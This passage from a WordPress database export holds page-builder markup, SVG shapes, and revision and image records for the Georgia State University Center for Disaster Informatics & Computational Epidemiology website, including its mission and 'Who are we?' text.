d=\"M107.68,50.62,109,50l1.34-.16h1.37l3.38.24,7.53.69c3.79-.37,7.58-.94,11.38-1,2.78-.09,5.59.74,8.37.6,4.39-.2,8.66-.6,12.82,1.52,1.39.71,3.31.41,5,.5,5.85.3,11.71.5,17.55.87,5.36.33,10.71.82,16.06,1.29,2,.17,4,.53,6,.67a12.84,12.84,0,0,0,2.58-.33c-3.2-.48-6.38-1.08-9.58-1.41-4-.42-8.2-.17-12.13-1-6.24-1.36-12.38-2.39-18.8-1.53a24.07,24.07,0,0,1-6.73-.53A4.51,4.51,0,0,1,152.65,49c-1.62-2-2.9-4.19-4.57-6.09a4.87,4.87,0,0,0-3.17-1.67c-.6,0-1.54,1.58-1.78,2.58-.85,3.6-2,4.58-5.7,3.95-3-.52-6.07-2.29-8.83.75-.3.32-1.29,0-2,0l-17.77,0c-2.55,0-5.1-.13-7.63.08s-4.86.75-7.29,1.15l11.69,1.71Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M360.25,69.74a19.45,19.45,0,0,0,14.27-2c.71-.37,1.78,0,2.68,0l6.27-.07,2.08-.58,1.19-.92,4.8-1.7c-1-1.37-1.64-3.69-3.93-1.23A12,12,0,0,1,385,64.85c-.33-1-.63-2-1-3a18.81,18.81,0,0,0-1.68-4.41,12,12,0,0,0-3.45-3.06c-1.13-.74-2.77-1.81-3.68-1.45s-1.92,2.22-2,3.47c-.16,3.27.3,6.5,4,8.14l-5.48,2.41L366,69.46l1.26-4.74c-4.21,3.49-8.38,3.43-12.54,2.69.26.7.53,1.4.79,2.09A18.31,18.31,0,0,1,360.25,69.74Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M348.81,67.74c2.05,1.76,4.37,1.82,6.69,1.76-.26-.69-.53-1.39-.79-2.09-1.83-.33-3.65-.78-5.48-1.14-.8-.15-1.81.75-2.73,1.16C347.29,67.52,348.32,67.32,348.81,67.74Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M398.14,57.66c-1.34,1.74-2.11,3.92-3.14,5.9l-.21.18.13.24,4.18-3.2,1.3-.76a16.63,16.63,0,0,0,1.42-3.64c.68-4.85,3.49-7,8.2-6.2.6.09,1.37-.88,2.06-1.36-.95-.27-1.94-.86-2.84-.74-3.33.45-5.75-.55-7.18-3.7a12.14,12.14,0,0,0-1.77-2.05c-2.86,6.11-7.58.56-11.51,2.26a21.74,21.74,0,0,0,5.76,3.5C400,50.22,401.48,53.3,398.14,57.66Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M18,59.82c-3.68-.16-5.72,1.74-4.66,4.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1345.25,39.33c.3,0,.55.88.77,1.37.58,1.23,1.13,2.47,1.69,3.7l2.78-5.82-7-6-.67.1C1342.29,35.36,1339.64,38.82,1345.25,39.33Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1348.71,56.82c1.07,2,1.79,1.74,3.33.61.7-.52,2.73-.57,3-.14,2.09,3.45,6.52,5.43,6.51,10.21a2.57,2.57,0,0,0,.77,1.48c4,4.4,9.59,5.64,14.78,7.72-2.36-2.43-1.84-7-6.08-8.1-.31-.08-.28-1.2-.54-1.77a4.87,4.87,0,0,0-1.22-2c-2.44-1.76-3.56-4.63-2.31-7.25.46-1,1.66-1.6,2.52-2.39a10.27,10.27,0,0,1,1.53,2.56c1.57,6.2,2.6,7.28,7.45,7.5l.09,5.57,1.23,0c.27-1.59.53-3.18,1-5.86,3.67,4.78,7.64,5.42,12,3.82.32-2.42.6-4.58.9-6.79l-2.77-.25c2.64-2.3,2.94-6.83,6.84-7.06-.26,2.92-.5,5.68-.78,8.8,1.51-.67,2.58-1.51,3-1.26,2.8,1.75,4.12.21,5.78-1.86,1.06-1.32,2.8-1.86,3.72.87.47,1.39,2.2,3.53,3,3.39a24.34,24.34,0,0,0,7.85-3c.78-.44.74-2.47.89-3.8s.12-2.9.17-4.35l-4.43-3.18-2.82,4.13c-2.88-.62-5.19-1.4-7.54-1.54s-5.25,1.11-7.38.33c-4-1.47-7.74-1.09-12.06.48a60.15,60.15,0,0,0-1.34-6.22,5,5,0,0,0-2-2.32,8.13,8.13,0,0,0-2.6-.63c-4.54-1.08-9-2-13.14,1.33a1.15,1.15,0,0,1-.59.32c-1,0-2.67.35-3-.14a5.71,5.71,0,0,1-.79-3.75,3,3,0,0,1,2.19-1.91c2.28,0,3.34-1.09,3-3.06s-1-4.09-3.92-3.47l1,2.41c-5.2,4-5.45,7-1.59,12.2a7.69,7.69,0,0,1,1.12,4.78,16.93,16.93,0,0,1-2,6.45c-.66-2.71-1.33-5.41-2.15-8.73a12.13,12.13,0,0,1-2,2.32c-.81.54-2,1.24-2.76,1-3.9-1.42-7.57-.73-11.24.69C1346.42,55.58,1348.18,55.86,1348.71,56.82ZM1375,55.71l3.17.95c1.82-1.8,2.31-3.65,1.13-6.07-.37-.74.35-2,.57-3,1,.58,2.29.94,3,1.79a45.93,45.93,0,0,1,3.11,5.31c-2.2,5.44-3.26,6.29-5.41,4.5l-3.89,2.24-2.7-4.92Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1429.65,59.51l3.06-1.52c.23,2.5-1.93,5,1.42,6.94l1.95-4.61,6.73,4.13,2.06-6c2.61,1.08,5.58,1.46,7.18,3.14,2.69,2.82,2.31,3.16,4.89.34a8.88,8.88,0,0,1,1.73-1.1c-.55,1.79-1,3.11-1.36,4.43l.72.38,3.19-1.9,2.57,3.17,3.38-4c2.19,1.56,3.36.64,4.3-1.57a3.45,3.45,0,0,1,2.45-1.77c.65,0,2,1.33,1.92,1.9-.14,1-1.18,1.76-1.85,2.62-.24.31-.52.58-.8.9,2.72,2.6,3.66-1,5.56-1.39l1.82,2.69c3.6-1.56,7.17-2.85,10.48-4.63,2.13-1.15,3.15-.7,4.45,1.1,1.48,2.05,3.51,3.51,7.27,3.65l-3.55-4.65a38.14,38.14,0,0,1,3.73,1.53c4.47,2.55,6.71,2,9.73-2.09a4.21,4.21,0,0,1,2.82-1.14,11.3,11.3,0,0,1,3,.6c1.52.3,3.49.1,4.44,1,.75.71.27,2.73.34,4.33a9.11,9.11,0,0,0,1.13-.48c4.42-2.68,5-2.61,8.87,1a3,3,0,0,0,5-1.65,28.62,28.62,0,0,0,.39-3.35c-1.18-.17-2.38-.28-3.54-.54-.94-.21-2.19-.33-2.69-1-2.81-3.64-7.42-3-11-4.73-.53-.25-1.77,1.16-2.76,1.63-1.19.56-2.6,1.53-3.68,1.29-4.88-1.06-6.15-.72-8.55,3.33l-5.16-.84c1.76-1.94,3.09-3.39,4.34-4.75-1.52-2.92-3.62-2.05-5-.87s-1.88,3.11-3,5.11c.11-3.16-.94-4.58-4.1-4.6-2.37,0-4.7-1.27-7.09-1.67a11.57,11.57,0,0,0-5,.06c-5.69,1.72-11.31,3.2-17.18.85a3.25,3.25,0,0,0-1.64-.14c-4.84.8-9.6,1-14.13-1.42a2.26,2.26,0,0,0-1.89-.12c-3.88,2.49-7.63,1.6-11.47-.11-.83-.37-2.19-.7-2.78-.29a4.61,4.61,0,0,1-5,.26c-1.55-.71-3.2-1.21-5.14-1.92-.25.81-.51,1.61-.76,2.42C1424.18,52.92,1427.59,55.41,1429.65,59.51Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1551.42,67.2c.56-1.29,1-2.54,1.61-3.69,1-1.93,4.37-2.72,5.42-1.28,2.92,4,7,4.8,11.86,4.8-.43-1.29-.75-2.21-1-3l5.34-4.25c2.54,2.71,4.76,5.31,7.28,7.57.67.61,2.35.44,3.42.14a5,5,0,0,0,1.9-1.28c1.89.52,3.92,1.38,4.11,1.08,1.62-2.56,5.43-3.51,5.47-7.21-2.48-.1-5.16-.84-7.4-.15-2.72.84-4.89.35-7.47-.28a38,38,0,0,0-9.55-.55c-2.6,0-5.18.76-7.78.85-3.25.12-6.57-.48-9.76,0-2.3.31-3.86.26-5.24-1.75a3.27,3.27,0,0,0-2.34-.91c-1.65,2.19-3.6,3.28-6.38,2.48-.1,0-.36.5-.55.77l1,6.9C1544.78,64.68,1547.93,65.4,1551.42,67.2Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1639.23,56.13l5,.11c2.64,6.34,6.6,11.29,14.84,10.85-.46,4.49,2,5.65,5.79,5.51,1.84-.07,3.7.16,5.55.25l1.69,4.38,1.21.06,1.76-.72c-.47-1-1-2-1.39-3-1.48-4-2.47-4.47-6.42-3.34a9.44,9.44,0,0,1-2.19.11c-.91-5.38-1.74-6.27-5-5.53-2.64.61-4-.91-3.32-3.67,1.13-4.46.57-5-4.39-5.07-2.74,0-5.27-.5-7-3.14-2.47-3.86-3.72-4.21-8.1-2.84l3.32,1.35Z\"\n          transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1623.78,53.05c3.4-.23,6.83,0,10.11,0l2.21-3.28c-.78-.31-1.59-.93-2.34-.86-5,.43-10,1-15,1.55C1619.85,52.5,1621.42,53.22,1623.78,53.05Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1361.67,35.06c-2.1-.64-6.14,1-7,2.88C1357.09,37.24,1360.28,38.33,1361.67,35.06Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341,50.21l1.76,2.4c1.6-.91,3.2-1.81,4.8-2.73,1.29-.74,2.32-1.54.54-2.86l-6.89,2.85h0Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1339.42,50.35l1.6-.14.21-.34-1.82-.1Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n        <path d=\"M1341.23,49.87h0l-.21.34Z\" transform=\"translate(0 0)\" opacity=\"0.6\"></path>\n      </svg>\n    </div>\n    <div class=\"h-section-grid-container h-navigation-padding h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"22-h25\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-213 style-local-22-h25 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-214-outer style-local-22-h26-outer\">\n            <div data-colibri-id=\"22-h26\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-214 style-local-22-h26 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h27\" class=\"h-global-transition-all h-heading style-215 style-local-22-h27 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-215 style-local-22-h27\">\n                    <!---->\n                    <!---->\n                    <h3 class=\"\">Center for Disaster Informatics &amp; Computational Epidemiology</h3>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h28\" class=\"h-lead h-text h-text-component style-216 style-local-22-h28 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Enabling Data-Driven Disaster Assessment &amp; Planning\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"22-h29\" class=\"h-x-container style-677 style-local-22-h29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-x-container-inner style-dynamic-22-h29-group style-677-spacing style-local-22-h29-spacing\"><span class=\"h-button__outer style-678-outer style-local-22-h30-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/about/our-mission/\"  data-colibri-id=\"22-h30\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-678 style-local-22-h30 position-relative\"><!----><!----> <span>our mission</span></a>\n                    </span><span class=\"h-button__outer style-679-outer style-local-22-h39-outer d-inline-flex h-element\"><a h-use-smooth-scroll=\"true\" href=\"https://gsudice.dataconn.net/about/\"  data-colibri-id=\"22-h39\" class=\"d-flex w-100 align-items-center h-button justify-content-lg-center justify-content-md-center justify-content-center style-679 style-local-22-h39 position-relative\"><!----><!----> <span>Learn more</span></a>\n                    </span>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-220-outer style-local-22-h33-outer\">\n            <div data-colibri-id=\"22-h33\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-3 h-px-md-3 h-px-3 v-inner-lg-3 v-inner-md-3 v-inner-3 style-220 style-local-22-h33 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-center align-self-md-center align-self-center\">\n                <!---->\n                <div data-colibri-id=\"22-h34\" class=\"d-block style-221 style-local-22-h34 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/02/unsplash.jpg\" class=\"wp-image-258 style-221-image style-local-22-h34-image\">\n                      <div class=\"h-image__frame h-image__frame_shadow style-221-frameImage style-local-22-h34-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','header_front_page','','inherit','closed','closed','','22-revision-v1','','','2022-05-03 13:33:38','2022-05-03 17:33:38','',22,'https://gsudice.dataconn.net/?p=1320',0,'revision','',0),(1324,1,'2022-05-03 13:35:46','2022-05-03 17:35:46','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About\",\"attrs\":{\"id\":\"about\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c4\",\"parentId\":\"122-c3\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":0,\"id\":\"122-c5\",\"partialId\":122,\"styleRef\":288,\"type\":\"content\",\"props\":{\"content\":\"Who are we?\"}},{\"name\":\"hop-heading\",\"parentId\":\"122-c4\",\"index\":1,\"id\":\"122-c6\",\"partialId\":122,\"styleRef\":289,\"type\":\"content\",\"props\":{\"content\":\"The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c4\",\"index\":2,\"id\":\"122-c7\",\"partialId\":122,\"styleRef\":290,\"type\":\"content\",\"props\":{\"content\":\"<p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit partners; and local communities. <\\/p>\"}}],\"styleRef\":287,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c8\",\"parentId\":\"122-c3\",\"partialId\":122,\"styleRef\":291,\"type\":\"content\"}],\"id\":\"122-c3\",\"parentId\":\"122-c2\",\"partialId\":122,\"styleRef\":286,\"type\":\"content\"}],\"id\":\"122-c2\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":285,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"122-c18\",\"parentId\":\"122-c17\",\"partialId\":122,\"styleRef\":294,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"122-c19\",\"parentId\":\"122-c17\",\"partialId\":122,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"122-c19\",\"index\":0,\"id\":\"122-c20\",\"partialId\":122,\"styleRef\":296,\"type\":\"content\",\"props\":{\"content\":\"What do we do?\"}},{\"name\":\"hop-text\",\"parentId\":\"122-c19\",\"index\":2,\"id\":\"122-c21\",\"partialId\":122,\"styleRef\":298,\"type\":\"content\",\"props\":{\"content\":\"<p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners<\\/p>\"}}],\"styleRef\":295,\"type\":\"content\"}],\"id\":\"122-c17\",\"parentId\":\"122-c16\",\"partialId\":122,\"styleRef\":293,\"type\":\"content\"}],\"id\":\"122-c16\",\"parentId\":\"122-c1\",\"partialId\":122,\"styleRef\":292,\"type\":\"content\"}],\"id\":\"122-c1\",\"partialId\":122,\"styleRef\":280,\"type\":\"content\"}','','','inherit','closed','closed','','353-revision-v1','','','2022-05-03 13:35:46','2022-05-03 17:35:46','',353,'https://gsudice.dataconn.net/?p=1324',0,'revision','',0),(1325,1,'2022-05-03 13:35:46','2022-05-03 17:35:46','<div data-colibri-id=\"122-c1\" class=\"style-280 style-local-122-c1 position-relative\">\n  <!---->\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c2\" id=\"about\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-285 style-local-122-c2 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c3\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-286 style-local-122-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-287-outer style-local-122-c4-outer\">\n            <div data-colibri-id=\"122-c4\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-287 style-local-122-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c5\" class=\"h-global-transition-all h-heading style-288 style-local-122-c5 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-288 style-local-122-c5\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">Who are we?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c6\" class=\"h-global-transition-all h-heading style-289 style-local-122-c6 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-289 style-local-122-c6\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">The Center for Disaster Informatics &amp; Computational Epidemiology (DICE) at Georgia State University</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c7\" class=\"h-text h-text-component style-290 style-local-122-c7 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>... brings together scientists and practitioners from diverse domains to develop computational methodologies that facilitate research in Public Health, Disaster Mitigation, and Response Planning. DICE will enable translational research\n                      that enhances population resilience to the adverse impacts of disasters and diseases using data-driven approaches and computational tools and through meaningful engagement with academic collaborators; government, industry, and non-profit\n                      partners; and local communities. </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-291-outer style-local-122-c8-outer\">\n            <div data-colibri-id=\"122-c8\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-291 style-local-122-c8 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"122-c16\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-292 style-local-122-c16 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <!---->\n      <div data-colibri-id=\"122-c17\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-293 style-local-122-c17 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-294-outer style-local-122-c18-outer\">\n            <div data-colibri-id=\"122-c18\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-294 style-local-122-c18 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-295-outer style-local-122-c19-outer\">\n            <div data-colibri-id=\"122-c19\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-295 style-local-122-c19 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"122-c20\" class=\"h-global-transition-all h-heading style-296 style-local-122-c20 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-296 style-local-122-c20\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">What do we do?</h5>\n                  </div>\n                </div>\n                <div data-colibri-id=\"122-c21\" class=\"h-text h-text-component style-298 style-local-122-c21 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>While increasing the level of regional resilience to disasters is paramount, the barriers that limit access to disaster mitigation resources also lead to access disparities in Population Health. Whether determining access disparities\n                      that prevent individuals from accessing specific health resources or estimating the risk of exposure to vector-borne diseases, expertise from a multiplicity of scientific domains is required to develop tools that effectively facilitate\n                      these efforts. DICE provides the necessary resources for the required collaborations and shall serve as an interface between researchers and practitioners</p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','About','','inherit','closed','closed','','122-revision-v1','','','2022-05-03 13:35:46','2022-05-03 17:35:46','',122,'https://gsudice.dataconn.net/?p=1325',0,'revision','',0),(1335,1,'2022-06-10 09:02:18','2022-06-10 13:02:18','','IMG_1240','','inherit','open','closed','','img_1240','','','2022-06-10 09:02:18','2022-06-10 13:02:18','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/06/IMG_1240.jpg',0,'attachment','image/jpeg',0),(1336,1,'2022-06-10 09:02:36','2022-06-10 13:02:36','https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg','IMG_1240','','inherit','open','closed','','img_1240-2','','','2023-10-13 10:03:22','2023-10-13 14:03:22','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/06/cropped-IMG_1240-scaled-1.jpg',0,'attachment','image/jpeg',0),(1348,1,'2022-08-31 10:18:29','2022-08-31 14:18:29','','hu_new','','inherit','open','closed','','hu_new-2','','','2022-08-31 10:18:29','2022-08-31 14:18:29','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/08/hu_new-1.jpg',0,'attachment','image/jpeg',0),(1357,1,'2022-10-24 12:26:39','2022-10-24 16:26:39','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ruby-1.jpg','cropped-Ruby-1.jpg','','inherit','open','closed','','cropped-ruby-1-jpg','','','2022-10-24 12:26:39','2022-10-24 16:26:39','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Ruby-1.jpg',0,'attachment','image/jpeg',0),(1358,1,'2022-10-24 12:26:58','2022-10-24 16:26:58','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg','cropped-cropped-ruby_parcells-scaled-1.jpg','','inherit','open','closed','','cropped-cropped-ruby_parcells-scaled-1-jpg','','','2022-10-24 12:26:58','2022-10-24 16:26:58','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-ruby_parcells-scaled-1.jpg',0,'attachment','image/jpeg',0),(1359,1,'2022-10-24 12:28:39','2022-10-24 16:28:39','https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg','cropped-cropped-ruby_parcells-scaled-1-1.jpg','','inherit','open','closed','','cropped-cropped-ruby_parcells-scaled-1-1-jpg','','','2022-10-24 12:28:39','2022-10-24 16:28:39','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-cropped-ruby_parcells-scaled-1-1.jpg',0,'attachment','image/jpeg',0),(1369,1,'2022-11-03 22:57:40','2022-11-04 02:57:40','','bayo','','inherit','open','closed','','bayo','','','2023-09-26 22:19:52','2023-09-27 02:19:52','',0,'https://gsudice.dataconn.net/wp-content/uploads/2022/11/bayo.jpeg',0,'attachment','image/jpeg',0),(1388,1,'2023-09-26 21:06:27','2023-09-27 01:06:27','<div class=\"style-407 style-local-182-c1 position-relative\" data-colibri-id=\"182-c1\">\n<div id=\"team\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-510 style-local-182-c2 position-relative\" data-colibri-component=\"section\" data-colibri-id=\"182-c2\">\n<div class=\"h-section-grid-container h-section-boxed-container\">\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-522 style-local-182-c67 position-relative\" data-colibri-id=\"182-c67\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-523-outer style-local-182-c68-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-523 style-local-182-c68 position-relative\" data-colibri-id=\"182-c68\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n<div class=\"h-global-transition-all h-heading style-524 style-local-182-c69 position-relative h-element\" data-colibri-id=\"182-c69\">\n<div class=\"h-heading__outer style-524 style-local-182-c69\">\n<h2 class=\"\">Faculty</h2>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-511 style-local-182-c3 position-relative\" data-colibri-id=\"182-c3\">\n<div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n<div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-512-outer style-local-182-c4-outer\">\n<div class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-512 style-local-182-c4 position-relative\" data-colibri-id=\"182-c4\">\n<div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start 